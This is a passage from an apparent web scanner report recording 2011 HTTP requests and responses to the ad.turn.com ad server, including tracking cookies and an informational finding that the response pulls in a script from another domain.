sBbxvhPCuAxHKY_BYCKAf2FzvKM6_svKMY-WOYUH6QaQPs9bAqtnbooWp_NrkXSMzjtGaat6yYLZMG4wQKFopdYuz1yBk-BAyTBTFwNjYduwxOD4xUkQkq0n0yMG86X_ZGC4oqWnwItPsoAoxJQfw-oyEQxRyhTeXLgOjd5mCNMGZRMvzlM-SIYtOVAAH4DJGVnLyE0zHY91AS25fF1MGItnXKXtvQQ0XtSgyP9-pRtjKBA9CwziYiIFZaUlrv8g-zYvqHHpjw1q3jr96MmE73EdnErm3L1-gbIWhcHpgba-bkNmD98dgLeBf_Vl6MIVnKxMALSuj37arSozuBgqeZjp8etrKZBIl9s2WXnmelQBS41tEU4KqMVJJLJFDSB1wQojnNFImZOIrKkZ-0eszXplpY4YQXnDiLDBqyosL8KyUlDOLbOUwHwhiIhI6vYlDAmBKnXvMqSvs52IOLcaY_lbOwL7psDf_Pg2Vk_EWg-3dTD9pFYOZom_dEc7B4kQgu9vbZKtEwlYAq2bVnwph6eqpjpOTl7s6FAXEc8n5El2XcbrTuandLa9TdSokJHtMGGH7U6ZV0D5pFleY0M_uVIjbBBIbk23oiSXPjciHxzjuyXjG-zeqT6hUnbo2htLjMWqUwdTc0Z54gQS40DQvJIuqPCvcJKTepk1MIfmuO0KP08mYHrJgtkwbjBAoWil1i7PXIGT8_7Ynt0HUAVUg1LVCMkJvvdUa0NuxLM2XW_puxeWePs4L_JfIFlRNCH2BuG7vC_L4X8zVG3yrgYLQ9gmeibnuQQ0XtSgyP9-pRtjKBA9Cw16l2Bub3KJ7ymT3J4Bv7dCHggxjgs4w7v5Xlb-5Op5EeGOwOQvlXCQVM9zSiiNHAMwzbS6XH8PIk3LelOrpPmbnTIM_wFLXfcwd5V86XjQkFpy_Vf7zkSF-ItYRvthr17Fbccyc8U5wh4Ud4Hlpu2BSlKVf-0QjJg7odNI1SvXDFZUDCpeqjMAw9BbmEmo9VRTWoBesfzoEDV34GPtDUqWbddG37JENOgdwRu5oBEZT3zNzuVrhEcz_5yMF9anYcUaI5c5g72UFM30Fam4qiIW0kJe224E7ZHXxZky5qxCNQGrife3ozBKJDbsyQMPpr8VRTr8Nl9SK1_WCr4ljw61UakqYfbO7oQoFYd5M61iF1TMePRIs3Ql47Rec4vrEgkid5u8voWars0ao_qpATqNKxYofDxJVJxV2JyJkeGjx8ZZ9F1bENTTHi8N7GFJxIY4oQmqqzgtHazWsPWt1suyfQtl-zq1WlNAP-ra31MFT62KO2zMSbyoDUc4nlNLLQ280wA0cJ2fnl2nbKCRFIwabHeO1tJ0mQSu_lU8mDh79eASK3CzJILgeOVnPR4h-UD67rWzrCvcGN43R9JZamXPrp2SIyybD8qG64FzqzbiUeBKdjk4Q0WseETs1mstawYgQV6i3wLehxniYitFUqB0qx6n4Sx5M49jRDbG3z0fm4MYY6yOCTgcgJUotifXIPRJK_lYL5YT6meUEDXaDLls-s2N0tVF9FTqz_IvmKwsVb_AwgxfUmqv256f9FBhFz4CyJBZn9RINMKTQ3I7SD4IvpVCCi5QQeiCwAJ9mtshbXCXAmoaypZIKgDK2iZjUMEHuD9RnwyqD6Wq4bpy4mdj_D31tIFSPkJtTzkjXOkPl_cbJQJZDq2DASl7w2QDy2QYmdPtnHx9mNsQY77FlIMWTLthiL3azxi9cuGtaEnuseRERcltLCZN_0co_nleqLBgTHojRjIRAh8vFi-Kmm4PMWBGUMhX2n_owm7INZ823IXME2xcYfKsf5GA1n12R_KQ-bGhuMfAWIgr36FcFp2Kx6ETUIw9pUPtaaVCHK9LUH-pC5jIpymwqcwLl1rd5sbRVqFfW61UFG3cpiCzVVePtMQUHcLxWKuNPb9-xEnQDOfBE9jjuFfaqW11n4Z8gkAS7CDJ7RbRN2GoeGhDH7CnZm-I2pAxTWEb_rnAJ9X0-6X3tsbjmdaajFaedKpuGiqxqJvmC97USk8cC3zW6yBJ87fVsCdnN_iwA0UeJ2ZVKJC1WZQ2Cj89bgjKG60Lw4qQhUyKcqo87iqD5yFod3mdiwlNyM1oWHNqm8CvbfORytjdRjhbf7JbEIf8rssAHq7NNUrWkXWNCUV4Bx-yj0vrR0UEI6weVfp-RxkFvFbWxjVLfhsMZ5di1Y9J_ey_rda9aQ1LUtbxsDMO-voCN7QR1cLeM_diZYKaxJW8lOtL6k9WjEcr12zdJLmBkIhSDZIzszkCQ6-yypZbuQg6vaMipdlQwgBd_ulQOKnsmllfsMnlfrJRBI_W9CBMajAnCQDtZpQlmb1obfAqGpBTrEEaFD-sL-pUdmR_GMTe8_N0j; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:25:00 GMT; Path=/
Set-Cookie: fc=y4-HEq3o_QsSZuNtsiOwrvFrllcJ9_rUQwZI9DCQgaTcpLRe4bq3ReqRkOtaoYvFyHAuaTl9mF7nALiSlM6KORW1jBMsMhZGMM020wYbRBOBkYH-sePWOj8HY_mY9pYLM5X-u9m5dwAGrOdM8vb6gws9mbIcr60LBGz2AczjWmsVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:25:00 GMT; Path=/
Set-Cookie: pf=OgjII4cHhp8HQxROAmJMEkG3BLC8eEQOeJ73B5k4FhYIHKIn0aMUCJnjty0nF6sdgjbg707c8UN19xROYfxBRPF7NLQ1XvvumSS375GpfK3B8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:25:00 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 16:24:59 GMT
Content-Length: 10874


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
QdRw2WoZD8G7XUPGVbZ5GL2fdg%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3905.turn.com/B5269631.6;abr=!ie;sz=160x600;ord=2809293250540149997?;click=http://r.turn.com/r/tpclick/id/7RxZvFOd_CaL8gwA-wEBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBND4Z2k60TYf_MpTGsQfl-Ky5DMCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtwcQdRw2WoZD8G7XUPGVbZ5GL2fdg%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;">\n</SCRIPT>
...[SNIP]...

24.30. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25805860&ahcid=973433&bimpd=KcL-dYVrd1LHDnQorXWd06JuB3ZsWJanuRCeZ79ASSwwZDmrtwDCMVQgQ9kqp0OM2DM-fY4Y1621GbWJDt0Ylq9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BKRgeMWOxnhllrTwR4fSEloqXHg5ybSqorAUuT7WodTias5odc_fN8lrM1sP_YEU8L8QXAnSoShrDHVAIaX5P2UXYkMwDMhThyDTSkJz17--1yYfUx0aSWjU5rLek88zmFr8VI-VhbAS9dWBM1kZBJwYfsAjue5PSL-h0Ho2t7SEPQ132Ppbuk7ijoUndfzz7rjO3SD4VdqcfcG-eEfpQLVpn1pX92TXvJ5-KusSxbhSpzPMafoj1ZGi5kyWVEWKxwaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IRxgM2aC6JuWrx_7_5RQ2-Q4-qt8dRxfRrYf9CqeMIgg4DbfNAl_25G-CXhfHV44tX91mNtx9s8FQapZIbkQ1tO176w3mh_t7mVXDw8Rxd3iNpimYF7PyrXxKau66bMUFxM9Cpxmh6ci9ZEp0Ip-5iiZvJnZAWhwjW9SAf1pZAjbt_T370WDWWY1SqEwEJwbh74bkML2wXdcAojXeE04DSM7CYAs_o3XcXMAh-wjz3-xA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRAjwANFgwK5TqKJzYiJ-pjsjysanZM1w5mcw&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBN9_Aj0C0TYysNIr1lAenxNi5AsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtzbeNgLdPCbfD3Ds5szuyDluw_7WA%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676642&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658642845&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658642849&frm=1&adk=2614322350&ga_vid=89410918.1303658643&ga_sid=1303658643&ga_hid=1796920425&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895132&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=FfdNBPqTg5Ogeg4Gvt1sD91oc1OvAAIopJH1MfG_EhLnC_qO6MHzQQWlPjZ1W_-t77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rddTOvP6b6gjBcpH_C1SCNpqOOOSUZ6393Jg_uuC6PaOyufpl4r1zJFBSq1N8uZBwmJnJIAhkromTQp5NWh0AmJAoqPsrsARTvM4FL3_F2IyUWnSvjM6YIyaPo076xrJcUMRbqqdnKZE_Rr_uBv1fpYoqTX7HdciFKtDLlrsXGI8WeFEaqmhzc4AexOvlbEc2vBxeaHaPnRGzUGsshYknbHZ76c4pTy1x4tO_Sj_92V_c7n9dBgb-mUQwCsfFjswrIIZPRlERVaGhUKD4I6xui-k8lCKtjWb8L9cUWaU-0UIo8q2otA9JeeRhKkLEFeUQ_RMNQF2iyMUjVL7ttzR-BfUwEHA_EPrShsGu2vVdRNE585cySrnTOh9dMxUw7WE-jbzjFm2F4SROX5XJ58cmC66JFBq_2-XSn1gqAIjLZzdU6477_djhhS3SPkBUOiwXvOlmotVFErHsZ98d0kz-YJqri-pvt5MhqWaQjjpMBxrbDxPEDs1qpDsWDsRvlIeEnz5gKDVPYLbmT4OmR4NPZdtD7k9QAhA1y9lElb1FxLMTTlE9wGHxh1vi4jaKSjW24VcWuh9OwP5WPMPXscRpCIMAUwsBeLeV0CDvZM5QZ6Ftq1YsQUmG14zwsdGjNCmXvH89Ns8YMIodbd9oSQ80dokk7S5ul1zP6BLW5eswwD4eWnSvjM6YIyaPo076xrJcUOxLUO2TMPVjIrqDa0tm-KiBTwJ3Mz3nWcDL3eoMcRG7qSFM-Ia8iW6v4r--R4cQ0tOXuzZZM1HHBzHQCnHDFIT76c4pTy1x4tO_Sj_92V_c2h3ymUN4Kcfp_vUL9n2zWwMihkX8zucrcdwEbmMe-hvJRVE-2eJRtXuJuLGMKv73tIlgifHPMyMYOKyKgjFTLZMNQF2iyMUjVL7ttzR-BfUXXk1Trf8LJnbyKEXEXy4Rs5cySrnTOh9dMxUw7WE-jZwNXri7ovUdLf3Y0d2cR3Mo0lffrMYn7DG3CobkkduYq477_djhhS3SPkBUOiwXvO6Kt9mMt7SwQaRBfvCxoXpri-pvt5MhqWaQjjpMBxrbFAAi6qyCp8bWnTpeqxAQqD-Dto7E8GwAg5Pmqnod8-GD7k9QAhA1y9lElb1FxLMTYR8GJndpgqdetG7Gif1SgdcWuh9OwP5WPMPXscRpCIMi1HTwWt6KUDOBOeqTXHz5bMr71kjDg1X648oQCMr_-pcs6-yUjStQuln63OD6AXuthlJn1ar6k7JMNu1QAN0iG54DqOheKMDeziVqBn8GZyeZoSeZjxWwnMyW93qk8bfadK-MzpgjJo-jTvrGslxQ1Lf8W-KixpiMgaKLVnFYfdM2M4TlfE8-EAAJpHFMIjpod24YCXPiz88Q4FnH7hHkwC363daRWvDMQSggQ0XBJ3vpzilPLXHi079KP_3ZX9z_D3Pnxac4hOmSOizeoBAAmxcqNpbx_qyOHF8bx__m3LXXSqRzn2UVUm82kY9Q_bAWhV-NPCnkoMVp1trM0nzB0w1AXaLIxSNUvu23NH4F9Q13Du5h2ZYkpF0eVjjZLPxzlzJKudM6H10zFTDtYT6Nv7ck4hLa59nrUxBxfvK0jsTiDPqMR2OonD2-THiRk-erjvv92OGFLdI-QFQ6LBe8_DPa6OuqYk9OTYaaVjd1DGuL6m-3kyGpZpCOOkwHGtsbfcmG0fy54O8N3wai-WvMYQPGY_BRfLoJQ-fzCavlZTH05yYchy8iu18YHh3Yjeufsyc4tF_hYWieSe2zh_teVxa6H07A_lY8w9exxGkIgyJaaRHTrwpoz27fIZ1IYrP0_5bgJl8vrWh4S5IofNmvPz02zxgwih1t32hJDzR2iSFfqx4MhvTgtjM3lWSYPHVadK-MzpgjJo-jTvrGslxQ0RcVu8jaTaGeoRXAyPCre50Ap9gnzkFEVb7fs7kVfWDMqWV5CaT_WJtk2pUzRC4eg47W10Xto39Ckmzrya4h33vpzilPLXHi079KP_3ZX9zDr0_5RCzZyGIrZvmqD0qM4OT5YshiebyZ7gQJS9Y2G7nSV4NcuM8rWRbl8qnNncE-KnYHtDCpxbmzdYonZCReozEk2lFkYL78ePNoyJfDPFQx6yXCg7HucZPwYbGMGquQBLetBIomVzLxRoGxCnj9AuAQa0jxkQqiAZvgO5_1I0StRTQfNp_8TKujPl08Nio3VO03uwsDFLvsKFK97otf3P7Da31DnYEVo5TPgRz20GdnA6Cc72wg-FSafZjckluCDYSsbafBv55Fuk04mpOQ-8wTaZoi4WtPLy3Y3_RsAIb58ANfJNPw7PDUJnwvB5dd6Pj4inu1F6wbmUeqF8IzBEKDqi96IV8EJZ5BHYIe6k7CD2J70CjIpgjp325VAAQQdaIpbGH7ED3K8MO0N02HXED1_Q1nKKRzK6-Rem3ynzIZcssxMIxa11vVxs5mT5Uf91F7QAbAskQZLgankz_lEAtsWoRc15hRbwTJ6OpTIfeE9K-EkC4wSG3itwHytKKywH0jEuEtimvw01NpAdll_S12LxBxPSFr3AblTJ7QlhxOn7NpzXjHY_E5lvc4A6NuB7ghG0r9F5ryP8PbOUmNlPE47_4cVrSmIJL5HRi5olIbPfhz06rl7TrRbZu6TgoL4F9VUieGd2NNutj5j2Ykjk_oiZPJQNg7s-IVZj_8x19CUDvtIMl1s27WDYDzDWC_LSD_hITbj4n3NJ1VnSODES7HgOnosb-a6IAhKWZEUXaNYisGujMcHx0-V460jT0WaPFOl7r-G1YurokLRfo7nTkNuS-FBQ8_zqCnhKxdkov0SCCBSsA9JuQotNKJ3eme79-Yk8VnPY0NhpeTxKpkv2hrlh0-3r1iJk9NptV68epA5hgUytkmdmxxZLnHriOqlwIRUgsfIlB6JAryIf1QYW7ABDvcp7PlPgkJSWReqXTf7i8khFNnmzwH7l3uSRIJ9CaGKwVgQZWnfY1DwqN3RpkxZoDBSjtxesSm3Uug3sv9nwUirjHGXOnnQOyMp0rDIgHDbs1vRtyybpwPmOc5yMEuMrTMtlonH_O9JeRPOWP0ZIih2xqCfVz4XEoVm7IJ9GGhR58b-k1cysnOhgQ4XoPFs4VpT53jYjQ1BIgYtT_QesIMpas4UCL7cLQUCYEefF8ZhuDwI6vTYJUDfh7N4eviQPgiUdr4wy3HO5F-m_plXLm1QU_y8eE9lmQCYwznt4hvD-1jgLwfCa--WFUa_x_ig6W75jQfoKoJulCUXe_iyUTY0KihwMRsyHtwNg6X-lTVLUMvMaLLHAZy6qByVfshfmQXD3gCj1g9GfL5GWIfSL8ueQYsJ2aTgwcNjtxIY7OiRH46Py8__ZNIhhU37x5BD07goFgJXPSoi1qO3GYCyHDGFt0zB7oyV5Po_JUlyVJIDWF8ZE3Z5lVCujHjrE_-wqHnoWVM_QmHLTwkEB8etYNKKOHF_ktFST_LIiB; fc=F2nbXY4wwxMQ2-he6VYeifaRRxFr5MeY29EQT3n5PvLWxCHnHcZ9c7H5tLCAyYGL9mvM8AxO6Wo9RZJIxm2oF2_ICtsxL0KUEYWMLSd-wG8Gn2BjtD6YgIvLsovsrQsM3UekJ-H8erl5fjZijTgySbhjzsJdH2qIqE1UGB4xWwFfA3hHwBPZ26rwLfEhGtco; pf=8SLxkLbfsZjR0znsHi3neH4OSvybkQwzidj39osYezeS04H7stKnZdMqlx3yK2bU4q1C_4bU43_azC2tZTPOE5xKMUvxbd3f4Da9CFOTnTLWCQKR_r6qY54lFjJbA4MKo2PgnaN3rNEZPcj1JP_yFl3OnJaEawY-HzaiUFPHnzHCJURYTll9YSZFjFvcZECT7ANZN-zFyB3LaaiNSQAne-eUjAeuFexCQpSIGGE-hCu26aZc5sDc4UJmeMYA4wA4zO05pHI-TuL2Zs_aTFBxV5zGyX9gCVIJL41fXCewMtGIOTObyhw6XI9NsuIQ3LHMPwDuZeCTmjbOJ12_tYZY7qYaNMhlV9JYPNAa9WJ26feij1a04Z4aJbTbeEF7HREPS4iF2IFkJR-IDjmCPDngrg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 15:24:01 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:24:01 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=7AAylrWKIVhNuAs87JxGCRCSJHZeTdXezI0D9NJ6a5PnC_qO6MHzQQWlPjZ1W_-t77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rdc2aowGRsmMGOORBHFqq1hrKFGf11GQBCaTryYIy66k1Lbg67H_mFhqYpVt5VVsi2XJoH4cOuvYUlTkCNcoKzYAdgu4XslHdLUJdEdEt_L2OmnSvjM6YIyaPo076xrJcUPDfvc-m12o4eU_X4AfQuhSE27uj29BfS5yq62USuCcbJ2mysphCbCOVHqkVufyR5Q62RM2XV0z6C22WKqfjLo-76c4pTy1x4tO_Sj_92V_c1u4FyfVVkmOuJxKRp8QC6wZPRlERVaGhUKD4I6xui-ki4slcpsV4_YoV0y--m4Qlgor-Q1vFAi894mdTAlxRFNMNQF2iyMUjVL7ttzR-BfUoMtXb3zJ_1CaLbprfO5U_c5cySrnTOh9dMxUw7WE-jYmKgt5cY46b6MV7NBE9VX32urm-ry6jxYchB52pCvRCa477_djhhS3SPkBUOiwXvMuAIvtw3qJsqMTs-t2v5Nbri-pvt5MhqWaQjjpMBxrbAt0Rro9MFn3YcrOkIone7IW8rbiCicnaD0D3xClXaPsqfmiMdLsciWIM4b1u0MpP2jIB4jnOUZJeLhwif9hALNcWuh9OwP5WPMPXscRpCIM0d2lc41wKmughwY_IxPP5_1CU_YfMraxq29_IqADH6GpDjfslrVyDxMBDlIppEJHfWMJvUK7-VYvE81JVloy8WnSvjM6YIyaPo076xrJcUNUnQxjwdFOzx_mxcgiPuIVikZt4xeL6nraPEnFmjJxqOFEaqmhzc4AexOvlbEc2vA7d_A9Ex4u8L8MYkk-pHgB76c4pTy1x4tO_Sj_92V_c9h4fr-Htwjt7vJe5LUxNUy8mSFRnxnBUrSsMeG95GDwh2wcMme0iUWoKhBYOnQRKQ-L_G3rtWzZSuOdIZvPJI1MNQF2iyMUjVL7ttzR-BfU4B4b4PkUCiI9UG71RU2rwc5cySrnTOh9dMxUw7WE-jZnT7YN_qit-pppX8ieIZXFopU5ahUpSCMio_EHYBXmY6477_djhhS3SPkBUOiwXvNYG_PBcE7oO-VIGFRvROC4ri-pvt5MhqWaQjjpMBxrbNlkLvW_KEfuZkonGbimE96hFkyin_Ijn54D8ZQYQyeQUojhpX01rVy9-nj4jsvWlPdIPhRkfOZD7Gw1oNE5R6FcWuh9OwP5WPMPXscRpCIMLDk9u2iD_o5joM7tR4nqGZYKnb2z6Y6Pip6mhLX9XQxueA6joXijA3s4lagZ_BmcVsphV8i-n-3ZxgEk_BJbDWckgCGSuiZNCnk1aHQCYkCsf5KZ7TmC1fTidCrYRFhvadK-MzpgjJo-jTvrGslxQ-EBqeQGzurhA-gvboh4M5Oxx6ofeEwTxjyh52LD6j9l2_hjlieDEGkxFdag2l_AobCKXnOxySrfnBwp-yju2vfvpzilPLXHi079KP_3ZX9zeaZpHy6aMq7VGz7_Jh8cAWxcqNpbx_qyOHF8bx__m3JkprymxGzfqpQVRY_xh9IOXa0cOruPGEgoAV_0V4_lPkw1AXaLIxSNUvu23NH4F9SIMWdPUA27wTLqw9R0LRHQzlzJKudM6H10zFTDtYT6NgxdRhxIarGlQtPJ5QaPO04WLTfTrJHnA8Zv068h-z8Lrjvv92OGFLdI-QFQ6LBe8yeo6tDpPXwU4mq4aA_aVNGuL6m-3kyGpZpCOOkwHGtsRQIvmbwcEjsACQqy7s1Ma_6XUxNWV_x3y1Dgbw7ZdDlD3XZ60zEd7PscVtFglBi6b1WGV6iwg7NH-zR6O9-wzFxa6H07A_lY8w9exxGkIgx14szYCYWLc51KkoWrhNpwX44MqLQrS2FC2KyGUGLUzMmgfhw669hSVOQI1ygrNgAwxC92_0OE1lATj_Bzvmr4adK-MzpgjJo-jTvrGslxQ0RcVu8jaTaGeoRXAyPCre50Ap9gnzkFEVb7fs7kVfWDThC1pGjTZZuhHGHA3E_QQXxkg2yxfEHKDos_Bqq8NfIsW8wMgGAV6CfA1krWoLQe4kzxLtSTmVijNow7L7wGVRmewd1PfUpL13yozkEZMCBZq2ojIysf__pACQPz6WjyY07u7-PrMFII43SAOmNYvdhEaPSmFtlLGE04IfCzZxTt9sNlFJRvvu5P5sXJ2NUDySPq9u1JKEzFdNesEpAt9OF7usBCtaBxEYdWOPP-OIgtmFUaNljpvX9JR1I3grJnonJr7gSbbdqVK6A62RZ5pnP7Da31DnYEVo5TPgRz20GdnA6Cc72wg-FSafZjckluCDYSsbafBv55Fuk04mpOQ-8wTaZoi4WtPLy3Y3_RsAIY0YdZfR1C53YFS4UzCpVao4M6lACg9Ka1lBdWnIoikcWtuyxBrsYt7ZfQAzB8ixJqAO1sOJhbO-SqsIs2Wu9uCjjD-5cBltBFh_O44g1lsAwz2oy4wXv4qwpeSTirO4AcukFMN9RReoOEB7Wu6-f8vCrtdyALUf3pKI5_oaRw1_YeuOiNzeltRzaV0mWOzDENncluAnHU3sm63nq7JK5gWOXtbf7_p74l-7BEJAPDwzLo0cjlfh7C2Un6uUH4prsq6v1w_UD8Qa5i0CGZnvhMXZXyE2q_UBepiqWhIyCn03x5Z_BlBDTOYdoecN60JnDzzVk5IX_z-_KLcMA_1rudCgjp6xR70I1SCg42p6vdEkPMQyyuEse00OvHPc4vrQBn-zrn5Lgk0bkTnpqZz-Al4AdkuP0HWAtc-MYJLZEZPqRnY5HS0QoeCPldzgCvr1buzTCOuX5XqCH1hNy-cmLuVBz-iSxOnimAuuDzjOpt2Kl6xSfGeVUxVOuTAhOYMMeA91xIRi7QUeERAsKntEwAO0GfjoaPY7h0TIk56bkZCW8y6QbdvI6rXNRaaOcqAZDo69WFsxOosvLmDqhzVI6Eqj_dU0CZohAUv9oDGcJ_SZsOPuAneoSNG5kjdB6SR_MpfzDPjmR9qzeF4GCCLPELxoZN695X9iYg1HTTxWdZRDsLr3P-a0KneKIkmwz5s6-w9AZ38CgWbIB0GiMhlXsPumrkaSoPlhB7OWNmG5aV91Zm6zDXPfSfQDSoI6OS6NVAkTz3ZUNeJEg2uSSekJ1k2n-P6TqgmXuEciRaxrYAP6TCUA2MXoPTjePaQNt875Vv8DCDF9Saq_bnp_0UGEXPgLIkFmf1Eg0wpNDcjtIPgi-lUIKLlBB6ILAAn2a2yFtcJcCahrKlkgqAMraJmNQwQe4P1GfDKoPparhunLiZ2P8PfW0gVI-Qm1POSNc6Q-X9xslAlkOrYMBKXvDZAPLZBiZ0-2cfH2Y2xBjvsWUgxZMu2GIvdrPGL1y4a1oSe6x5ERFyW0sJk3_Ryj-eV6osGBMeiNGMhECHy8WL4qabg8xYEZQyFfaf-jCbsg1nzbdhTQaGxLXcDh_3tZBPVKzviQlTCk98i0VL5weMeS043otIq17_yxETqA3oNTLxfYxDKsBLClMr5jQQz_quFBUl; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:24:01 GMT; Path=/
Set-Cookie: fc=8GhtwjTuwnVWutbA-MYJRGsmAj2Yvhu-6xuJrYmSSWvWxCHnHcZ9c7H5tLCAyYGL9mvM8AxO6Wo9RZJIxm2oF7_HZvWoOmTYJsLobWmbE24DvTphMIx4YVn390CgbAR93UekJ-H8erl5fjZijTgySbhjzsJdH2qIqE1UGB4xWwFfA3hHwBPZ26rwLfEhGtco; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:24:01 GMT; Path=/
